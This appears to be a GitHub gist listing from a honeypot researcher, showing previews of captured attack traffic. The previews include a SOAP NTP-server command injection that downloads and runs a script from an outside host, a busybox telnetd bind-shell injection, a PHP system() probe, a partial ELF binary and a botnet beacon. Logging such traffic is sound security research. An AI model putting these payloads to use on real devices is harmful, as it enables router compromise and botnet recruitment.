Skip to content

Instantly share code, notes, and snippets.

Keybase proof

I hereby claim:

  • I am glaslos on github.
  • I am lukas_rist (https://keybase.io/lukas_rist) on keybase.
  • I have a public key whose fingerprint is 4E4C AF1B 47DA 9D1A 8BDF 5B66 D205 7E64 41E8 D9EA

To claim this, I am signing this object:

package glutton
import (
"context"
"net"
"strings"
"go.uber.org/zap"
)
@glaslos
glaslos / Unsolicited
Created March 29, 2017 10:06
Unsolicited response received on idle HTTP channel
2017/03/28 11:57:55 Unsolicited response received on idle HTTP channel starting with "\u007fELF\x01\x01\x01\x03\x00\x00\x00\x00\x00\x00\x00\x00\x02\x00(\x00\x01\x00\x00\x00\x90&\x02\x004\x00\x00\x00\x00\x00\x00\x00\x02\x02\x00\x054\x00 \x00\x02\x00(\x00\x00\x00\x00\x00\x01\x00\x00\x00\x00\x00\x00\x00\x00\x00\x01\x00\x00\x00\x01\x00a7\x01\x00a7\x01\x00\x05\x00\x00\x00\x00\x00\x01\x00\x01\x00\x00\x00\xfc\x06\x00\x00\xfc\x06\x05\x00\xfc\x06\x05\x00\x00\x00\x00\x00\x00\x00\x00\x00\x06\x00\x00\x00\x00\x00\x01\x00\xef\x8c\xc4c\xf5\x96\xa4\xb5\xf0\x10\r\x17\x00\x00\x00\x00Ц\x02\x00Ц\x02\x00\xd4\x00\x00\x00i\x00\x00\x00\x0e\x00\x00\x00\x1a\x03\x00?\x91E\x84h;\xdeަ\x0f#\xf0\xd4$\x19u\xd8FO\xb5\xdd\xea\xce\xe0J\xbeHz!\xaeZ\t\xa1\x00\xf1\xa1+\x89~K\f6,\x9b?/]\x8aTd\x04D\aV:\xa8\xe1\xbc Ɠqw&\xc1\xa4\xe2.\xae\xb2\x0f\xd7\t\xfe\xa2\xa3\xc4\f\x8a\rK\xc9&0=^J;\xbbZ\x8cb#\xe3\xce;\xc7XTN\xc0 \f\x99\x02\x00\xdb#\x01\x00\x0eP\x00\x00\x1a\x03\x00\x06\xb0\x8fm\xa7\x01\xaat\x15O\xe8&\x11e\xf9\xd1\xf7\xb7A\xf6,\xa8\u05fb:4\xf4Ȕ\x0e
DEBU[70484] [glutton ] new connection: 94.102.51.26:33622 -> 9100
DEBU[70484] [gollum ] response: 200 OK
INFO[70484] [log.tcp ] 94.102.51.26
00000000 52 45 41 44 20 2d 2d 3e 0a 2d 2d 2d 2d 2d 2d 2d |READ -->.-------|
00000010 0a 73 74 61 63 6b 6f 76 65 72 66 6c 6f 77 69 6e |.stackoverflowin|
00000020 20 68 61 73 20 72 65 74 75 72 6e 65 64 20 74 6f | has returned to|
00000030 20 68 69 73 20 67 6c 6f 72 79 2c 0a 79 6f 75 72 | his glory,.your|
00000040 20 70 72 69 6e 74 65 72 20 69 73 20 70 61 72 74 | printer is part|
00000050 20 6f 66 20 61 20 62 6f 74 6e 65 74 2c 0a 74 68 | of a botnet,.th|
00000060 65 20 67 6f 64 20 68 61 73 20 72 65 74 75 72 6e |e god has return|
DEBU[5636] [glutton ] new connection: 115.212.186.110:49904 -> 6789
INFO[5636] [log.tcp ] 115.212.186.110
00000000 0d 0a 38 38 38 38 38 38 0d 0a 38 38 38 38 38 38 |..888888..888888|
00000010 0d 0a 73 68 65 6c 6c 0d 0a 22 60 62 75 73 79 62 |..shell.."`busyb|
00000020 6f 78 20 74 65 6c 6e 65 74 64 20 2d 70 20 31 39 |ox telnetd -p 19|
00000030 30 35 38 20 2d 6c 20 2f 62 69 6e 2f 73 68 60 22 |058 -l /bin/sh`"|
00000040 0d 0a 22 60 62 75 73 79 62 6f 78 20 74 65 6c 6e |.."`busybox teln|
00000050 65 74 64 20 2d 70 20 31 39 30 35 38 20 2d 6c 20 |etd -p 19058 -l |
00000060 2f 62 69 6e 2f 73 68 60 22 0d 0a |/bin/sh`"..|
00000000 6c 76 7c 27 7c 27 7c 56 48 4a 76 61 6d 46 75 58 |lv|'|'|VHJvamFuX|
00000010 30 4d 30 4e 6b 59 32 52 54 6b 3d 7c 27 7c 27 7c |0M0NkY2RTk=|'|'||
00000020 4d 41 52 4b 7c 27 7c 27 7c 75 73 65 72 7c 27 7c |MARK|'|'|user|'||
00000030 27 7c 32 30 31 33 2d 31 31 2d 32 32 7c 27 7c 27 |'|2013-11-22|'|'|
00000040 7c 7c 27 7c 27 7c 57 69 6e 20 58 50 7c 27 7c 27 |||'|'|Win XP|'|'|
00000050 7c 4e 6f 7c 27 7c 27 7c 30 2e 36 2e 34 7c 27 7c ||No|'|'|0.6.4|'||
00000060 27 7c 2e 2e 7c 27 7c 27 7c 7c 27 7c 27 7c 5b 65 |'|..|'|'||'|'|[e|
00000070 6e 64 6f 66 5d |ndof]|
>>> base64.b64decode("VHJvamFuX0M0NkY2RTk=")
@glaslos
glaslos / SOAP.xml
Created January 9, 2017 12:00
Get me some soap...
<?xml version="1.0"?>
<SOAP-ENV:Envelope xmlns:SOAP-ENV="http://schemas.xmlsoap.org/soap/envelope/" SOAP-ENV:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/">
<SOAP-ENV:Body>
<u:SetNTPServers xmlns:u="urn:dslforum-org:service:Time:1">
<NewNTPServer1>`cd /var/tmp;cd /tmp;wget http://glzfk.pw:8080/a;sh a`</NewNTPServer1>
<NewNTPServer2/>
<NewNTPServer3/>
<NewNTPServer4/>
<NewNTPServer5/>
</u:SetNTPServers>
<?php echo("test successful"); ?>
<?php
system("uname -a");
?>
import sys
import tty
import termios
fd = sys.stdin.fileno()
# keep original terminal settings
old_settings = termios.tcgetattr(fd)